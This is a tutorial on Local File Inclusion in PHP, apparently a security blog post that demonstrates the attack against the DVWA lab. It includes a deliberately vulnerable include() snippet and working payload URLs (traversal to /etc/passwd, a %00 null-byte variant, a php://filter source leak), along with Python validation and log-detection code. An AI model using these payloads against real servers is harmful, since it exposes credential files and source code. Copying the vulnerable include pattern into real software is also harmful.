
Local File Inclusion Attack

Introduction

Local File Inclusion (LFI) is the process of including files that are already present locally on the server. The vulnerability occurs when user input supplies the path of the file to be included. When that input is not properly sanitized, an attacker can supply default file names to access unauthorized files, or use directory traversal sequences (such as dot-dot-slash) to retrieve sensitive files from other directories.

Example: Local file inclusion in PHP

  • Consider the following URL:

http://192.168.223.128/dvwa/vulnerabilities/fi/?page=include.php

  • The value of the “page” parameter is taken into the following PHP code, and the named file is included without any validation:

<?php
    $file = $_GET['page'];   // user-controlled value
    include($file);          // passed straight to include(): traversal, null bytes and wrappers all reach here
?>

  • To test for this flaw successfully, the tester needs knowledge of the system being tested and of the location of the files being requested: there is no point requesting /etc/passwd from an IIS web server. Each operating system also uses different characters for its root directory and path separator:

Linux:

    root directory: “/”
    directory separator: “/”

Windows:

    root directory: “<drive letter>:\”
    directory separator: “\” or “/”

  • An attacker can now give malicious input in the “page” parameter to retrieve unauthorized files present in the same directory, or use directory traversal sequences such as “../” to move to other directories. For example, to read user credentials on a Linux system, supply “../../../../../../../../../etc/passwd”:

http://192.168.223.128/dvwa/vulnerabilities/fi/?page=../../../../../../../../etc/passwd

  • In some cases a default file extension is appended to the user input before inclusion; the classic way to prevent the extension from being appended is to terminate the input with a null byte, “%00” (PHP 5.3.4 and later reject paths containing a null byte, so this only works on older versions):

http://192.168.223.128/dvwa/vulnerabilities/fi/?page=../../../../../../../../etc/passwd%00
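As an added example (not code from the original post or from DVWA), here is the validation that the vulnerable include() above lacks, written in Python so it runs stand-alone; the same steps map onto PHP's urldecode(), realpath() and an in_array() allowlist. The allowlist names, the throwaway demo directory and the rejected wrapper prefixes are assumptions made for the demo.

```python
import os
import tempfile
import urllib.parse

# Constructed allowlist: the only page names the application is meant to include.
ALLOWED_PAGES = frozenset({"include.php", "file1.php"})
# PHP stream-wrapper prefixes that must never reach include() (assumed list).
WRAPPER_PREFIXES = ("php:", "data:", "file:", "expect:")


def check_page(page_param: str, include_root: str):
    """Return (True, resolved_path) or (False, reason) for a raw `page` value."""
    # Decode once, as PHP already does for $_GET, then look at what the
    # decoded value would do if it were passed straight to include().
    decoded = urllib.parse.unquote(page_param)
    if "\x00" in decoded:
        return False, "null byte in page parameter"
    if "://" in decoded or decoded.lower().startswith(WRAPPER_PREFIXES):
        return False, "stream wrapper not allowed"
    # Resolve symlinks and ../ segments, then require the result to stay
    # inside the include directory (the realpath() containment check).
    root = os.path.realpath(include_root)
    candidate = os.path.realpath(os.path.join(root, decoded))
    if os.path.commonpath([root, candidate]) != root:
        return False, "resolved path escapes include root"
    # Even inside the directory, only known page names may be included.
    if os.path.relpath(candidate, root) not in ALLOWED_PAGES:
        return False, "page not in allowlist"
    if not os.path.isfile(candidate):
        return False, "page file missing"
    return True, candidate


def make_demo_root() -> str:
    """Create a throwaway include directory with two allowed pages and one
    file that exists but is not allowlisted (constructed for the demo)."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    for name in ("include.php", "file1.php", "secret.php"):
        with open(os.path.join(root, name), "w") as fh:
            fh.write("<?php // " + name + "\n")
    return root


if __name__ == "__main__":
    demo = make_demo_root()
    for value in ("include.php",
                  "../../../../../../../../etc/passwd",
                  "../../../../../../../../etc/passwd%00",
                  "php://filter/convert.base64-encode/resource=index.php",
                  "secret.php"):
        ok, detail = check_page(value, demo)
        print(f"{'ALLOW ' if ok else 'REJECT'} {value!r}: {detail}")
```

The order of the checks matters for the audit trail rather than for safety: the null byte and wrapper tests run first so the log says why a request was refused, the containment test catches every traversal shape regardless of how many “../” segments it carries, and the allowlist is the control that would stand on its own even if the other three were removed.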

  • If the server enables the php://filter wrapper, it can be used to read the source of PHP files instead of having them executed.

I have written about php://filter in the following article: http://hydrasky.com/2016/10/18/php-local-file-inclusion-using-wrapper-phpfilter/

Example using php://filter to read the content of a PHP file:

http://192.168.223.128/dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=index.php

I then receive the content of the file index.php, base64-encoded.


Decoding that string gives me the content of the file index.php.

Once you’ve got the source code, you can inspect it for further vulnerabilities!
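On the detection side, as an added example that is not part of the original article: a small scanner over constructed web-server access-log lines that flags the request shapes shown above (directory traversal, the %00 terminator, php:// style wrappers and absolute paths), decoding each query parameter up to twice so double-encoded variants are caught as well. The log lines, client address, timestamps and the list of wrapper schemes are assumptions made for the demo.

```python
import re
import urllib.parse

# Constructed sample access-log lines (combined log format). The request shapes
# mirror the payloads discussed above; host, client and timestamps are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Oct/2016:10:00:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 512
192.0.2.10 - - [18/Oct/2016:10:00:05 +0000] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../../../etc/passwd HTTP/1.1" 200 1834
192.0.2.10 - - [18/Oct/2016:10:00:09 +0000] "GET /dvwa/vulnerabilities/fi/?page=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1834
192.0.2.10 - - [18/Oct/2016:10:00:14 +0000] "GET /dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 4096
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
# PHP stream wrappers worth alerting on when they appear in a file parameter (assumed list).
WRAPPER_RE = re.compile(r"^(?:php|data|file|expect|phar)://", re.IGNORECASE)


def decode_param(value: str, rounds: int = 2) -> str:
    """Percent-decode repeatedly (bounded) so a double-encoded ..%252F is
    seen as ../ just as the server will eventually see it."""
    for _ in range(rounds):
        new = urllib.parse.unquote(value)
        if new == value:
            break
        value = new
    return value


def indicators_for(value: str) -> list:
    """Name every LFI indicator present in one decoded parameter value."""
    found = []
    if "../" in value or "..\\" in value:
        found.append("traversal")
    if "\x00" in value:
        found.append("null_byte")
    if WRAPPER_RE.match(value):
        found.append("wrapper")
    if value.startswith("/") or re.match(r"^[A-Za-z]:\\", value):
        found.append("absolute_path")
    return found


def scan_log(text: str) -> list:
    """Return one finding per query parameter that carries LFI indicators."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urllib.parse.urlsplit(m.group(1)).query
        for pair in query.split("&"):
            if not pair:
                continue
            name, _, raw = pair.partition("=")
            hits = indicators_for(decode_param(raw))
            if hits:
                findings.append({"line": line_no, "param": name, "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Matching on the decoded value rather than on the raw request line is what makes the third log line visible: its traversal is percent-encoded and the null byte only appears after decoding, so a pattern match on the literal text “../” would miss it.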

Reference

https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

http://hakipedia.com/index.php/Local_File_Inclusion
